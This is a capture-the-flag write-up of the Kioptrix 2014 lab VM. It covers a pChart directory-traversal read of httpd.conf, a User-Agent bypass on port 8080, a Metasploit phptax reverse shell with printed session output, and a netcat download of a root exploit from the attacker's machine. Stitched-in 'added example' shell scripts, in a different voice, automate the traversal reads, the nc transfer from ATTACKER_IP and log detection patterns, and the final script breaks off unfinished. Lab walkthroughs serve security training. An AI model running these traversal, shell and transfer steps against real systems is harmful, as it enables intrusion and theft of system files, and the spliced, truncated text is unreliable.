Kioptrix 2014 solution, proposed on SEC-TRACK.COM, by #KAGUREZAMA

After downloading the tar.bz2 I check the file before extracting it, so we make sure it was not damaged or modified during the download.
Once it is extracted, for those awkward cases where things do not work for me in VirtualBox I have VMware Player, which is, so to speak, a virtual machine player, without resorting to what they call piracy, because I cannot afford a licence for Workstation or something similar.

I open it, look at the settings, press play and that's it, the machine boots and the fun starts.

I had to remove the network card and create another one, and I left it in bridged mode because that is more convenient for me. Note that at the beginning it had the IP 192.168.2.101, but after a reboot it ended up with 192.168.2.104. I launch an nmap 192.168.2.1-254, which is the segment where the lab lives for this kind of thing.
It only has port 80 open, and 8080, so everything points to a web challenge, apparently. This is what appears on both ports when you open them in the browser. So, to see what is going on, I make a raw request with netcat to 8080 and the server answers the same thing: forbidden.

Already knowing it is a web challenge, I run nikto against it to try to discover something that gives me clues on where to go next, so first I go for port 80 and then I will do port 8080.

Well, there is not much, since the supposed vulnerability in mod_ssl is not real in this version on FreeBSD. On 8080 something very strange happened: I ran nikto -h 192.168.2.101 -port 8080 and, honestly, it took longer than usual without giving any result. Before venturing any further I went back to port 80, where the "It works!" text is, and looked at the page source, and this is what appeared. This is like the tale of Hansel and Gretel: they leave crumbs and you follow them. I go to the URL that is in the comment and find a nice file browser.

<html>
<head>
<!-- <META HTTP-EQUIV="refresh" CONTENT="5;URL=pChart2.1.3/index.php"> -->
</head>
<body>
<h1>It works!</h1>
</body>
</html>
As you can imagine, the first thing that came to mind after seeing this was to search for exploits for the application: search "exploits pchart2.1.3". As the saying goes, if it is there, it is there for a reason. In the search I found this one, http://es.1337day.com/exploit/21805, which was the one that worked for me. I tried, as the exploit says, to grab the users and their hashes to see whether I could get access that way, but it was not possible. Then the light bulb went on and I tried to pull the Apache configuration to see why it would not let me see anything on port 8080, but after a long while of frustration at not being able to get it, I remembered this was not Linux but FreeBSD, which changes things. I search Google for "logs apache freebsd" (logs rather than conf, because my initial idea was to see what was happening with Apache, but things turn around quickly, as an old Jedi acquaintance would say), and this page helped me: http://www.codeasite.com/index.php/linux-a-apache/94how-do-i-find-apache-http-server-log-files

I start building the request and finally get the following:

http://192.168.2.101/pChart2.1.3/examples/?Action=View&Script=/../../../usr/local/etc/apache22/httpd.conf

I have highlighted the configuration at the end of the file, where it specifies that you can only see the content if you come in with a User-Agent like the following:

Allow from env=Mozilla4_browser

#
# This is the main Apache HTTP server configuration file.  It contains the
# configuration directives that give the server its instructions.
# See <URL:http://httpd.apache.org/docs/2.2> for detailed information.
# In particular, see
# <URL:http://httpd.apache.org/docs/2.2/mod/directives.html>
# for a discussion of each configuration directive.
#
# Do NOT simply read the instructions in here without understanding
# what they do.  They're here only as hints or reminders.  If you are unsure
# consult the online docs. You have been warned.
#
# Configuration and logfile names: If the filenames you specify for many
# of the server's control files begin with "/" (or "drive:/" for Win32), the
# server will use that explicit path.  If the filenames do *not* begin
# with "/", the value of ServerRoot is prepended -- so "/var/log/foo_log"
# with ServerRoot set to "/usr/local" will be interpreted by the
# server as "/usr/local//var/log/foo_log".

#
# ServerRoot: The top of the directory tree under which the server's
# configuration, error, and log files are kept.
#
# Do not add a slash at the end of the directory path.  If you point
# ServerRoot at a non-local disk, be sure to point the LockFile directive
# at a local disk.  If you wish to share the same ServerRoot for multiple
# httpd daemons, you will need to change at least LockFile and PidFile.
#
ServerRoot "/usr/local"

#
# Listen: Allows you to bind Apache to specific IP addresses and/or
# ports, instead of the default. See also the <VirtualHost>
# directive.
#
# Change this to Listen on specific IP addresses as shown below to
# prevent Apache from glomming onto all bound IP addresses.
#
#Listen 12.34.56.78:80
Listen 80
Listen 8080

#
# Dynamic Shared Object (DSO) Support
#
# To be able to use the functionality of a module which was built as a DSO you
# have to place corresponding `LoadModule' lines at this location so the
# directives contained in it are actually available _before_ they are used.
# Statically compiled modules (those listed by `httpd -l') do not need
# to be loaded here.
#
# Example:
# LoadModule foo_module modules/mod_foo.so
#
LoadModule authn_file_module libexec/apache22/mod_authn_file.so
LoadModule authn_dbm_module libexec/apache22/mod_authn_dbm.so
LoadModule authn_anon_module libexec/apache22/mod_authn_anon.so
LoadModule authn_default_module libexec/apache22/mod_authn_default.so
LoadModule authn_alias_module libexec/apache22/mod_authn_alias.so
LoadModule authz_host_module libexec/apache22/mod_authz_host.so
LoadModule authz_groupfile_module libexec/apache22/mod_authz_groupfile.so
LoadModule authz_user_module libexec/apache22/mod_authz_user.so
LoadModule authz_dbm_module libexec/apache22/mod_authz_dbm.so
LoadModule authz_owner_module libexec/apache22/mod_authz_owner.so
LoadModule authz_default_module libexec/apache22/mod_authz_default.so
LoadModule auth_basic_module libexec/apache22/mod_auth_basic.so
LoadModule auth_digest_module libexec/apache22/mod_auth_digest.so
LoadModule file_cache_module libexec/apache22/mod_file_cache.so
LoadModule cache_module libexec/apache22/mod_cache.so
LoadModule disk_cache_module libexec/apache22/mod_disk_cache.so
LoadModule dumpio_module libexec/apache22/mod_dumpio.so
LoadModule reqtimeout_module libexec/apache22/mod_reqtimeout.so
LoadModule include_module libexec/apache22/mod_include.so
LoadModule filter_module libexec/apache22/mod_filter.so
LoadModule charset_lite_module libexec/apache22/mod_charset_lite.so
LoadModule deflate_module libexec/apache22/mod_deflate.so
LoadModule log_config_module libexec/apache22/mod_log_config.so
LoadModule logio_module libexec/apache22/mod_logio.so
LoadModule env_module libexec/apache22/mod_env.so
LoadModule mime_magic_module libexec/apache22/mod_mime_magic.so
LoadModule cern_meta_module libexec/apache22/mod_cern_meta.so
LoadModule expires_module libexec/apache22/mod_expires.so
LoadModule headers_module libexec/apache22/mod_headers.so
LoadModule usertrack_module libexec/apache22/mod_usertrack.so
LoadModule unique_id_module libexec/apache22/mod_unique_id.so
LoadModule setenvif_module libexec/apache22/mod_setenvif.so
LoadModule version_module libexec/apache22/mod_version.so
LoadModule ssl_module libexec/apache22/mod_ssl.so
LoadModule mime_module libexec/apache22/mod_mime.so
LoadModule dav_module libexec/apache22/mod_dav.so
LoadModule status_module libexec/apache22/mod_status.so
LoadModule autoindex_module libexec/apache22/mod_autoindex.so
LoadModule asis_module libexec/apache22/mod_asis.so
LoadModule info_module libexec/apache22/mod_info.so
LoadModule cgi_module libexec/apache22/mod_cgi.so
LoadModule dav_fs_module libexec/apache22/mod_dav_fs.so
LoadModule vhost_alias_module libexec/apache22/mod_vhost_alias.so
LoadModule negotiation_module libexec/apache22/mod_negotiation.so
LoadModule dir_module libexec/apache22/mod_dir.so
LoadModule imagemap_module libexec/apache22/mod_imagemap.so
LoadModule actions_module libexec/apache22/mod_actions.so
LoadModule speling_module libexec/apache22/mod_speling.so
LoadModule userdir_module libexec/apache22/mod_userdir.so
LoadModule alias_module libexec/apache22/mod_alias.so
LoadModule rewrite_module libexec/apache22/mod_rewrite.so
LoadModule php5_module libexec/apache22/libphp5.so

<IfModule !mpm_netware_module>
<IfModule !mpm_winnt_module>
#
# If you wish httpd to run as a different user or group, you must run
# httpd as root initially and it will switch.
#
# User/Group: The name (or #number) of the user/group to run httpd as.
# It is usually good practice to create a dedicated user and group for
# running httpd, as with most system services.
#
User www
Group www

</IfModule>
</IfModule>

# 'Main' server configuration
#
# The directives in this section set up the values used by the 'main'
# server, which responds to any requests that aren't handled by a
# <VirtualHost> definition.  These values also provide defaults for
# any <VirtualHost> containers you may define later in the file.
#
# All of these directives may appear inside <VirtualHost> containers,
# in which case these default settings will be overridden for the
# virtual host being defined.
#

#
# ServerAdmin: Your address, where problems with the server should be
# e-mailed.  This address appears on some server-generated pages, such
# as error documents.  e.g. admin@your-domain.com
#
ServerAdmin you@example.com

#
# ServerName gives the name and port that the server uses to identify itself.
# This can often be determined automatically, but we recommend you specify
# it explicitly to prevent problems during startup.
#
# If your host doesn't have a registered DNS name, enter its IP address here.
#
#ServerName www.example.com:80

#
# DocumentRoot: The directory out of which you will serve your
# documents. By default, all requests are taken from this directory, but
# symbolic links and aliases may be used to point to other locations.
#
DocumentRoot "/usr/local/www/apache22/data"

#
# Each directory to which Apache has access can be configured with respect
# to which services and features are allowed and/or disabled in that
# directory (and its subdirectories).
#
# First, we configure the "default" to be a very restrictive set of
# features.
#
<Directory />
    AllowOverride None
    Order deny,allow
    Deny from all
</Directory>

#
# Note that from this point forward you must specifically allow
# particular features to be enabled - so if something's not working as
# you might expect, make sure that you have specifically enabled it
# below.
#

#
# This should be changed to whatever you set DocumentRoot to.
#
<Directory "/usr/local/www/apache22/data">
    #
    # Possible values for the Options directive are "None", "All",
    # or any combination of:
    #   Indexes Includes FollowSymLinks SymLinksifOwnerMatch ExecCGI MultiViews
    #
    # Note that "MultiViews" must be named *explicitly* --- "Options All"
    # doesn't give it to you.
    #
    # The Options directive is both complicated and important.  Please see
    # http://httpd.apache.org/docs/2.2/mod/core.html#options
    # for more information.
    #
    Options Indexes FollowSymLinks

    #
    # AllowOverride controls what directives may be placed in .htaccess files.
    # It can be "All", "None", or any combination of the keywords:
    #   Options FileInfo AuthConfig Limit
    #
    AllowOverride None

    #
    # Controls who can get stuff from this server.
    #
    Order allow,deny
    Allow from all

</Directory>

#
# DirectoryIndex: sets the file that Apache will serve if a directory
# is requested.
#
<IfModule dir_module>
    DirectoryIndex index.php index.html
</IfModule>

#
# The following lines prevent .htaccess and .htpasswd files from being
# viewed by Web clients.
#
<FilesMatch "^\.ht">
    Order allow,deny
    Deny from all
    Satisfy All
</FilesMatch>

#
# ErrorLog: The location of the error log file.
# If you do not specify an ErrorLog directive within a <VirtualHost>
# container, error messages relating to that virtual host will be
# logged here.  If you *do* define an error logfile for a <VirtualHost>
# container, that host's errors will be logged there and not here.
#
ErrorLog "/var/log/httpd-error.log"

#
# LogLevel: Control the number of messages logged to the error_log.
# Possible values include: debug, info, notice, warn, error, crit,
# alert, emerg.
#
LogLevel warn

<IfModule log_config_module>
    #
    # The following directives define some format nicknames for use with
    # a CustomLog directive (see below).
    #
    LogFormat "%h %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\"" combined
    LogFormat "%h %l %u %t \"%r\" %>s %b" common

    <IfModule logio_module>
      # You need to enable mod_logio.c to use %I and %O
      LogFormat "%h %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\" %I %O" combinedio
    </IfModule>

    #
    # The location and format of the access logfile (Common Logfile Format).
    # If you do not define any access logfiles within a <VirtualHost>
    # container, they will be logged here.  Contrariwise, if you *do*
    # define per-<VirtualHost> access logfiles, transactions will be
    # logged therein and *not* in this file.
    #
    #CustomLog "/var/log/httpd-access.log" common

    #
    # If you prefer a logfile with access, agent, and referer information
    # (Combined Logfile Format) you can use the following directive.
    #
    CustomLog "/var/log/httpd-access.log" combined
</IfModule>

<IfModule alias_module>
    #
    # Redirect: Allows you to tell clients about documents that used to
    # exist in your server's namespace, but do not anymore. The client
    # will make a new request for the document at its new location.
    # Example:
    # Redirect permanent /foo http://www.example.com/bar

    #
    # Alias: Maps web paths into filesystem paths and is used to
    # access content that does not live under the DocumentRoot.
    # Example:
    # Alias /webpath /full/filesystem/path
    #
    # If you include a trailing / on /webpath then the server will
    # require it to be present in the URL.  You will also likely
    # need to provide a <Directory> section to allow access to
    # the filesystem path.

    #
    # ScriptAlias: This controls which directories contain server scripts.
    # ScriptAliases are essentially the same as Aliases, except that
    # documents in the target directory are treated as applications and
    # run by the server when requested rather than as documents sent to the
    # client.  The same rules about trailing "/" apply to ScriptAlias
    # directives as to Alias.
    #
    ScriptAlias /cgi-bin/ "/usr/local/www/apache22/cgi-bin/"

</IfModule>

<IfModule cgid_module>
    #
    # ScriptSock: On threaded servers, designate the path to the UNIX
    # socket used to communicate with the CGI daemon of mod_cgid.
    #
    #Scriptsock /var/run/cgisock
</IfModule>

#
# "/usr/local/www/apache22/cgi-bin" should be changed to whatever your ScriptAliased
# CGI directory exists, if you have that configured.
#
<Directory "/usr/local/www/apache22/cgi-bin">
    AllowOverride None
    Options None
    Order allow,deny
    Allow from all
</Directory>

#
# DefaultType: the default MIME type the server will use for a document
# if it cannot otherwise determine one, such as from filename extensions.
# If your server contains mostly text or HTML documents, "text/plain" is
# a good value.  If most of your content is binary, such as applications
# or images, you may want to use "application/octet-stream" instead to
# keep browsers from trying to display binary files as though they are
# text.
#
DefaultType text/plain

<IfModule mime_module>
    #
    # TypesConfig points to the file containing the list of mappings from
    # filename extension to MIME-type.
    #
    TypesConfig etc/apache22/mime.types

    #
    # AddType allows you to add to or override the MIME configuration
    # file specified in TypesConfig for specific file types.
    #
    #AddType application/x-gzip .tgz
    #
    # AddEncoding allows you to have certain browsers uncompress
    # information on the fly. Note: Not all browsers support this.
    #
    #AddEncoding x-compress .Z
    #AddEncoding x-gzip .gz .tgz
    #
    # If the AddEncoding directives above are commented-out, then you
    # probably should define those extensions to indicate media types:
    #
    AddType application/x-compress .Z
    AddType application/x-gzip .gz .tgz

    #
    # AddHandler allows you to map certain file extensions to "handlers":
    # actions unrelated to filetype. These can be either built into the server
    # or added with the Action directive (see below)
    #
    # To use CGI scripts outside of ScriptAliased directories:
    # (You will also need to add "ExecCGI" to the "Options" directive.)
    #
    #AddHandler cgi-script .cgi

    # For type maps (negotiated resources):
    #AddHandler type-map var

    #
    # Filters allow you to process content before it is sent to the client.
    #
    # To parse .shtml files for server-side includes (SSI):
    # (You will also need to add "Includes" to the "Options" directive.)
    #
    #AddType text/html .shtml
    #AddOutputFilter INCLUDES .shtml
    AddType application/x-httpd-php .php
    AddType application/x-httpd-php-source .phps
</IfModule>

#
# The mod_mime_magic module allows the server to use various hints from the
# contents of the file itself to determine its type.  The MIMEMagicFile
# directive tells the module where the hint definitions are located.
#
#MIMEMagicFile etc/apache22/magic

#
# Customizable error responses come in three flavors:
# 1) plain text 2) local redirects 3) external redirects
#
# Some examples:
#ErrorDocument 500 "The server made a boo boo."
#ErrorDocument 404 /missing.html
#ErrorDocument 404 "/cgi-bin/missing_handler.pl"
#ErrorDocument 402 http://www.example.com/subscription_info.html
#

#
# MaxRanges: Maximum number of Ranges in a request before
# returning the entire resource, or 0 for unlimited
# Default setting is to accept 200 Ranges
#MaxRanges 0

#
# EnableMMAP and EnableSendfile: On systems that support it,
# memory-mapping or the sendfile syscall is used to deliver
# files.  This usually improves server performance, but must
# be turned off when serving from networked-mounted
# filesystems or if support for these functions is otherwise
# broken on your system.
#
#EnableMMAP off
#EnableSendfile off

# Supplemental configuration
#
# The configuration files in the etc/apache22/extra/ directory can be
# included to add extra features or to modify the default configuration of
# the server, or you may simply copy their contents here and change as
# necessary.

# Server-pool management (MPM specific)
#Include etc/apache22/extra/httpd-mpm.conf

# Multi-language error messages
#Include etc/apache22/extra/httpd-multilang-errordoc.conf

# Fancy directory listings
#Include etc/apache22/extra/httpd-autoindex.conf

# Language settings
#Include etc/apache22/extra/httpd-languages.conf

# User home directories
#Include etc/apache22/extra/httpd-userdir.conf

# Real-time info on requests and configuration
#Include etc/apache22/extra/httpd-info.conf

# Virtual hosts
#Include etc/apache22/extra/httpd-vhosts.conf

# Local access to the Apache HTTP Server Manual
#Include etc/apache22/extra/httpd-manual.conf

# Distributed authoring and versioning (WebDAV)
#Include etc/apache22/extra/httpd-dav.conf

# Various default settings
#Include etc/apache22/extra/httpd-default.conf

# Secure (SSL/TLS) connections
#Include etc/apache22/extra/httpd-ssl.conf
#
# Note: The following must must be present to support
#       starting without SSL on platforms with no /dev/random equivalent
#       but a statically compiled-in mod_ssl.
#
<IfModule ssl_module>
SSLRandomSeed startup builtin
SSLRandomSeed connect builtin
</IfModule>

SetEnvIf User-Agent ^Mozilla/4.0 Mozilla4_browser

<VirtualHost *:8080>
    DocumentRoot /usr/local/www/apache22/data2
    <Directory "/usr/local/www/apache22/data2">
        Options Indexes FollowSymLinks
        AllowOverride All
        Order allow,deny
        Allow from env=Mozilla4_browser
    </Directory>
</VirtualHost>
Include etc/apache22/Includes/*.conf

Now knowing that a special User-Agent is needed to get into port 8080, I go in from the browser, having already changed the User-Agent with the User Agent Switcher extension in Iceweasel, a fork of Firefox. I set the User-Agent that is in the Apache configuration file, obtained through the pChart vulnerability that gives access to system files ("The traversal is executed with the web server's privilege and leads to sensitive file disclosure (passwd, siteconf.inc.php or similar), access to source codes, hardcoded passwords or other high impact consequences, depending on the web server's configuration. This problem may exist in the production code if the example code was copied into the production environment."), and it works wonderfully. Of course, if anyone needs almost all the existing User-Agents, here is a list compatible with the extension: http://techpatterns.com/forums/about304.html. The User-Agent ends up like this:
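The two steps above (reading httpd.conf through the pChart traversal, then presenting a User-Agent that satisfies the SetEnvIf rule) done from the shell instead of the browser, as an added example that is not part of the original write-up. It assumes the target address 192.168.2.101 from the write-up, curl on the attacking machine, and the pChart examples directory at the path the page shows; ua_allowed only emulates the regex Apache applies, so it runs offline, while pchart_read and fetch_8080 need the VM up. Note what the rule actually checks: a header the client chooses, anchored only at the start of the string, so anything beginning with Mozilla/4.0 passes. Metasploit's HTTP client at the time sent "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" by default, which is why the phptax module later in the write-up gets through port 8080 without any extra option. The real fix for a vhost like this is authentication (or at least Allow from a trusted address range), not a User-Agent match.

```shell
#!/bin/sh
# Added example, not from the original write-up. Assumed: target address,
# curl on the attacker, pChart example viewer at /pChart2.1.3/examples/.
TARGET=192.168.2.101

# Build the pChart traversal URL for an absolute path on the target.
# The page's own request prefixes "/../../../" so the Script parameter
# first climbs out of the examples directory, then descends into the path.
pchart_url() {
    printf 'http://%s/pChart2.1.3/examples/?Action=View&Script=/../../../%s\n' \
        "$TARGET" "${1#/}"
}

# Read a file off the target through the traversal (needs the VM up).
pchart_read() {
    curl -s "$(pchart_url "$1")"
}

# Emulate the rule found in httpd.conf:
#   SetEnvIf User-Agent ^Mozilla/4.0 Mozilla4_browser
#   Allow from env=Mozilla4_browser
# It is a regex anchored at the start of a client-supplied header, so any
# string beginning with "Mozilla/4.0" sets the variable. Returns 0 if allowed.
ua_allowed() {
    printf '%s\n' "$1" | grep -Eq '^Mozilla/4\.0'
}

# Fetch a path from the :8080 vhost with a User-Agent that satisfies the
# rule (needs the VM up). Any other UA gets the 403 the write-up saw.
fetch_8080() {
    curl -s -A 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)' \
        "http://$TARGET:8080/${1#/}"
}

# Files worth pulling first on a FreeBSD Apache 2.2 box; the Linux
# equivalents (/etc/apache2, /var/log/apache2) simply do not exist here.
freebsd_targets() {
    printf '%s\n' /usr/local/etc/apache22/httpd.conf /var/log/httpd-access.log /etc/passwd
}

# Live usage (only when asked for, so the functions can be sourced safely):
#   PCHART_RUN=1 sh pchart.sh
if [ -n "${PCHART_RUN:-}" ]; then
    for f in $(freebsd_targets); do
        echo "== $f"
        pchart_read "$f" | head -n 20
    done
    fetch_8080 / | head -n 20
fi
```

ua_allowed is deliberately the same check the server makes, so you can test candidate strings from the techpatterns list locally before switching the browser extension; only the first eleven characters matter.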
I go to http://192.168.2.101:8080/ and find a nice "Index of".

I click on phptax and find another web application.

And I go into the loop again: search for an exploit for the application if one exists, or otherwise find the weak spot myself. But they are supposed to leave applications that are vulnerable ("usually only in challenges"), so off to search. I go to exploit-db.com and after a search I find three exploits: http://www.exploitdb.com/search/?action=search&filter_page=1&filter_description=phptax&filter_exploit_text=&filter_author=&filter_platform=0&filter_type=0&filter_lang_id=0&filter_port=&filter_osvdb=&filter_cve=

There are three, of which only the last one worked for me. But to make my life easier I did the same search in Metasploit, since if it is on exploit-db it is likely to be included in the Metasploit that ships with Kali Linux. First I open Metasploit with

I wait... and oh! pleasant surprise, I see there is indeed something, and so it can save us quite a bit of work.
Here I set the options and exploit:

Exploit target:

   Id  Name
   --  ----
   0   PhpTax 0.8

msf exploit(phptax_exec) > set RHOST 192.168.2.101
RHOST => 192.168.2.101
msf exploit(phptax_exec) > set RPORT 8080
RPORT => 8080
msf exploit(phptax_exec) > set TARGETURI /phptax/
TARGETURI => /phptax/
msf exploit(phptax_exec) > exploit

[*] Started reverse double handler
[*] 192.168.2.101:8080 - Sending request...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo COI4EJBmKDBPQWpz;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "COI4EJBmKDBPQWpz\r\n"
[*] Matching...
[*] A is input...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo iilQukosvYD6jxe6;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "iilQukosvYD6jxe6\r\n"
[*] Command shell session 1 opened (192.168.2.104:4444 -> 192.168.2.101:58131) at 2014-04-14 00:23:49 -0500

First I do an ls to see what is in the directory I am in, then a uname -a to find out which FreeBSD version it is.

ls
data
drawimage.php
files
icons.inc
index.php
maps
pictures
readme
ttf
uname -a
FreeBSD kioptrix2014 9.0-RELEASE FreeBSD 9.0-RELEASE #0: Tue Jan  3 07:46:30 UTC 2012     root@farrell.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC  amd64

Then an ls of the /root directory, and I see what interests me: the flag, so to speak, congrats.txt. On seeing it I try to read it, cat /root/congrats.txt, and that is where my happiness ends. I get a nice and frustrating permission denied, which means only root has access to that file. But having the FreeBSD version, all that is left is to look for some exploit to gain root privileges.

ls /root
congrats.txt
folderMonitor.log
httpd-access.log
lazyClearLog.sh
monitor.py
ossec-alerts.log
cat /root/congrats.txt
cat: /root/congrats.txt: Permission denied

Once again Metasploit showed me there was one available for version nine, but only for local execution, and here my problem began: I had no way to download anything onto the server. I could not run basic things like wget, curl, php, python, nano or vi, so, the exploit being local, I had to find a way to upload what I needed, the exploit's source code, to compile and run it.
It occurred to me that, since it ran apps written in PHP, I could make an uploader and that would be it, so I made my first test, which was the classic hello, hola.php. I went to the browser, entered the address and yessssss!!!

So, as I am not very skilled in PHP, I copied the code from this page, http://www.w3schools.com/php/php_file_upload.asp. With that code I had problems with the <br> tag, so I simply removed it and it let me create the file upload_file.php.

But after much trying this solution would not work for me, so I leave it here as a mere anecdote.

And I went back to the beginning: try to get my exploit, downloaded from here, http://www.exploitdb.com/exploits/26368/, onto the remote machine, that is, the target, in order to root it (gain access with the privileges of the god called root). Of everything, the one thing it had never occurred to me to try was netcat, but my surprise was pleasant when, on typing nc, it threw this at me.

So it occurred to me to download my exploit through netcat. On Kali Linux it is very easy: following the process with the mouse, Apache is started.

I renamed the downloaded exploit to root.c and placed it in /var/www/root.c on the Kali machine, that is, "the attacker's", and then from the target I ran the following command, nc 192.168.105 80 > root.c, and made a request, GET /root.c HTTP/1.0, followed by Enter twice.

Right away I did a cat root.c and it had come across, only with a small error: it had added the HTTP headers to the C exploit and therefore would not let me compile it. But there is nothing that cannot be worked around on *nix systems; I only needed to do a tail -n 89 root.c > final.c and it was ready to compile.

Here it was just a matter of compiling the exploit and running it: gcc final.c -o root
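A more robust version of the netcat transfer above, as an added example that is not from the original write-up. The tail -n 89 trick works only when you already know how many lines of headers came first; stripping everything up to the first empty line handles any response. The attacker address is assumed (the write-up's session line shows 192.168.2.104 as the Kali side), the served file is /var/www/root.c as on the page, and the sample HTTP response inside the block is constructed for the offline check. The digest comparison uses sha256sum on Linux and FreeBSD's sha256 on the target, so a truncated or header-polluted copy is caught before gcc ever sees it.

```shell
#!/bin/sh
# Added example, not from the original write-up. Assumed: attacker address,
# root.c served from the attacker's web root as on the page, nc on the target.
ATTACKER_IP=192.168.2.104   # the Kali side of the Metasploit session line

# Drop everything up to and including the first empty line of an HTTP
# response. The header/body boundary is an empty line (CRLF), so this works
# for any number of headers, unlike counting lines for tail -n. Blank lines
# inside the body are kept because in_body is already set by then.
strip_http_headers() {
    awk 'in_body { print; next } /^\r?$/ { in_body = 1 }' "$@"
}

# Target side: fetch a file with a raw HTTP/1.0 request over nc and keep
# only the body. Equivalent of the manual "GET /root.c HTTP/1.0" + two Enters.
fetch_via_http() {
    printf 'GET /%s HTTP/1.0\r\n\r\n' "${1#/}" | nc "$ATTACKER_IP" 80 | strip_http_headers
}

# Alternative with no HTTP at all, so nothing to strip:
#   attacker:  nc -l -p 4444 < root.c      (OpenBSD/traditional nc on Kali)
#   target:    nc "$ATTACKER_IP" 4444 > root.c

# Hex SHA-256 of a file. Linux ships sha256sum; FreeBSD base has sha256
# (and md5) whose -q flag prints only the digest. Compare the two strings
# before compiling: a header-polluted or truncated copy will not match.
digest() {
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum "$1" | cut -d' ' -f1
    else
        sha256 -q "$1"
    fi
}

# Constructed sample response for an offline check of the header stripping.
sample_response() {
    printf 'HTTP/1.1 200 OK\r\nServer: Apache\r\nContent-Type: text/x-csrc\r\n\r\n'
    printf '#include <stdio.h>\n\nint main(void) { return 0; }\n'
}

# Live usage on the target, once nc is confirmed present:
#   fetch_via_http root.c > final.c && digest final.c   # compare with attacker
#   gcc final.c -o root && ./root
```

On the attacker side run digest against /var/www/root.c and compare the hex string with what the target prints; if they differ, the copy is incomplete or still carries headers, and compiling it will only produce confusing errors.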
With the id command I see that I am no longer the www user but root now, and I try again to read the message that sits in the user's home folder and YESSSSSSSSSSSSSSSSSSSS!!! I did it!!! I attach the contents of the congrats.txt file:
If you are reading this, it means you got root (or cheated).
Congratulations either way...

Hope you enjoyed this new VM of mine. As always, they are made for the beginner in
mind, and not meant for the seasoned pentester. However this does not mean one
can't enjoy them.

As with all my VMs, besides getting "root" on the system, the goal is to also
learn the basic skills needed to compromise a system. Most importantly, in my mind,
are information gathering & research. Anyone can throw massive amounts of exploits
and "hope" it works, but think about the traffic.. the logs... Best to take it
slow, and read up on the information you gathered and hopefully craft better
more targeted attacks.

For example, this system is FreeBSD 9. Hopefully you noticed this rather quickly.
Knowing the OS gives you any idea of what will work and what won't from the get go.
Default file locations are not the same on FreeBSD versus a Linux based distribution.
Apache logs aren't in "/var/log/apache/access.log", but in "/var/log/httpd-access.log".
Its default document root is not "/var/www/" but in "/usr/local/www/apache22/data".
Finding and knowing these little details will greatly help during an attack. Of course
my examples are specific for this target, but the theory applies to all systems.

As a small exercise, look at the logs and see how much noise you generated. Of course
the log results may not be accurate if you created a snapshot and reverted, but at
least it will give you an idea. For fun, I installed "OSSEC-HIDS" and monitored a few
things. Default settings, nothing fancy but it should've logged a few of your attacks. Look
at the following files:
/root/folderMonitor.log
/root/httpd-access.log (softlink)
/root/ossec-alerts.log (softlink)

The folderMonitor.log file is just a cheap script of mine to track created/deleted and modified
files in 2 specific folders. Since FreeBSD doesn't support "iNotify", I couldn't use OSSEC-HIDS
for this.
The httpd-access.log is rather self-explanatory.
Lastly, the ossec-alerts.log file is where OSSEC-HIDS puts alerts when monitoring certain
files. This one should've detected a few of your web attacks.

Feel free to explore the system and other log files to see how noisy, or silent, you were.
And again, thank you for taking the time to download and play.
Sincerely hope you enjoyed yourself.

Be good...

loneferret
http://www.kioptrix.com

p.s.: Keep in mind, for each "web attack" detected by OSSEC-HIDS, by default it would've blocked
your IP (both in hosts.allow & Firewall) for 600 seconds. I was nice enough to remove that part :)

As a closing thought, I would say: do not stop pushing on with your learning plans through this kind of challenge; they always leave lessons, as well as headaches that may one day come in handy. Thank you for reading, and forgive the spelling mistakes and other errors there may be in this document.
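As an added example that is not part of congrats.txt or of the write-up, a small log triage that does the "see how much noise you generated" exercise over the combined-format access log that the httpd.conf above writes to /var/log/httpd-access.log. The log lines in the block are constructed to mimic this walkthrough (Nikto's default User-Agent, the pChart traversal in plain and URL-encoded form, and a phptax request carrying shell metacharacters; the pfilez parameter name is an assumption, the page only shows the echo marker Metasploit sent). The real file is root-only on the VM, so read it after the privilege escalation or from a snapshot.

```shell
#!/bin/sh
# Added example, not from congrats.txt or the original write-up. The log
# lines are constructed; the request shape for phptax (pfilez) is assumed.

# Constructed sample in Apache "combined" format (the LogFormat in httpd.conf).
sample_log() {
cat <<'EOF'
192.168.2.104 - - [14/Apr/2014:00:01:10 -0500] "GET / HTTP/1.1" 200 45 "-" "Mozilla/5.0 (X11; Linux x86_64) Iceweasel/24.0"
192.168.2.104 - - [14/Apr/2014:00:02:31 -0500] "GET /cgi-bin/ HTTP/1.1" 403 202 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000001)"
192.168.2.104 - - [14/Apr/2014:00:15:02 -0500] "GET /pChart2.1.3/examples/?Action=View&Script=/../../../usr/local/etc/apache22/httpd.conf HTTP/1.1" 200 17493 "-" "Mozilla/5.0 (X11; Linux x86_64) Iceweasel/24.0"
192.168.2.104 - - [14/Apr/2014:00:20:45 -0500] "GET /pChart2.1.3/examples/?Action=View&Script=/..%2F..%2F..%2Fetc/passwd HTTP/1.1" 200 2100 "-" "Mozilla/5.0 (X11; Linux x86_64) Iceweasel/24.0"
192.168.2.104 - - [14/Apr/2014:00:23:49 -0500] "GET /phptax/drawimage.php?pfilez=xxx;echo%20COI4EJBmKDBPQWpz;&pdf=make HTTP/1.1" 200 0 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
192.168.2.104 - - [14/Apr/2014:00:24:10 -0500] "GET /phptax/index.php HTTP/1.1" 200 3120 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
EOF
}

# Flag the three kinds of noise this walkthrough left behind, reading the log
# on stdin: scanner User-Agents, directory traversal (plain or URL-encoded),
# and shell metacharacters in the phptax query string. One tag per line, first
# match wins, clean lines are dropped. Prints "<tag> <original line>".
noisy_requests() {
    awk '
        /Nikto\/|sqlmap|Nmap Scripting Engine/              { print "scanner-ua " $0; next }
        /\.\.\/|\.\.%2[fF]|%2[eE]%2[eE]/                    { print "traversal " $0; next }
        /drawimage[.]php[?][^"]*(;|%3[bB]|[|]|%7[cC])/      { print "cmd-inject " $0; next }
    '
}

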